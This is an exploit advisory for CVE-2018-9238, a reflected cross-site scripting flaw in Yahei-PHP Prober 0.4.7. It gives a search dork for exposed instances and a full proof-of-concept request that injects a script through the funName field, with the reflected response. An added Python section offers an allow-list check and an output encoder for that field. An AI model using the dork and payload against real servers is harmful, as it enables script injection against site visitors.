CVE-2018-9238

ManhNho, Apr 4th, 2018
# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
# Google Dork: intitle:"Proberv0." | inurl:/proberv.php
# Date: 23/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: http://www.yahei.net/
# Software Link: www.yahei.net/tz/tz_e.zip
# Version: 0.4.7
# CVE: CVE-2018-9238
# Category: Webapps

-----------------------------------------------------
PoC
-----------------------------------------------------
Request:

POST /proberv.php HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: <target>/proberv.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Connection: close
Upgrade-Insecure-Requests: 1

pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=

-----------------------------------------------------
Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 16:59:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 30461
...
<tr>
<td width="15%"></td>
<td width="60%">
Enter the function you want to test:
<input type="text" name="funName" size="50" />
</td>
<td width="25%">
<input class="btn" type="submit" name="act" align="right" value="Function Test" />
</td>
</tr>
<script>alert('Function')</script><script>alert("1");</script>Test results support the position: 错误')</script></table>
-----------------------------------------------------
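
Added example, not part of the original paste or of Yahei-PHP Prober's code: a request-side allow-list check and an output encoder for the `funName` field, written in Python. It assumes, based on the response above, that the value is reflected inside a JavaScript string in an inline script block; `funname_verdict`, `js_string_literal` and the benign sample body are hypothetical names and constructed data.

```python
import json
import re
from urllib.parse import parse_qs

# ASCII subset of PHP's function-name grammar (assumption: the prober only
# needs to test ASCII-named, non-namespaced functions).
PHP_IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\Z")

# Body of the PoC request shown above, copied from the paste.
POC_BODY = ("pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306"
            "&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3E"
            "alert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=")
# Constructed benign request for comparison (not from the paste).
BENIGN_BODY = "funName=mysqli_connect&act=Function+Test"


def funname_verdict(body: str) -> str:
    """Return 'absent', 'ok' or 'reject' for a urlencoded POST body."""
    values = parse_qs(body, keep_blank_values=True).get("funName", [])
    if not values or all(v == "" for v in values):
        return "absent"
    # Allow-list: anything that is not a plain identifier is rejected, which
    # covers quotes, brackets and tag characters without enumerating them.
    return "ok" if all(PHP_IDENT.match(v) for v in values) else "reject"


def js_string_literal(value: str) -> str:
    """Encode value as a JS string literal that is safe inside <script>."""
    # json.dumps escapes double quotes, backslashes, control characters and
    # (by default) all non-ASCII, including U+2028/U+2029.
    out = json.dumps(value)
    # It leaves <, >, & and ' untouched; escape them so the value cannot
    # close the script element or a single-quoted string.
    for ch in "<>&'":
        out = out.replace(ch, "\\u%04x" % ord(ch))
    return out


if __name__ == "__main__":
    for name, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(name, funname_verdict(body))
    reflected = parse_qs(POC_BODY)["funName"][0]
    print(js_string_literal(reflected))
```

The same two controls carry over to the PHP side: validate `funName` against the identifier pattern before use, and encode it for the JavaScript string context when it is written back into the page.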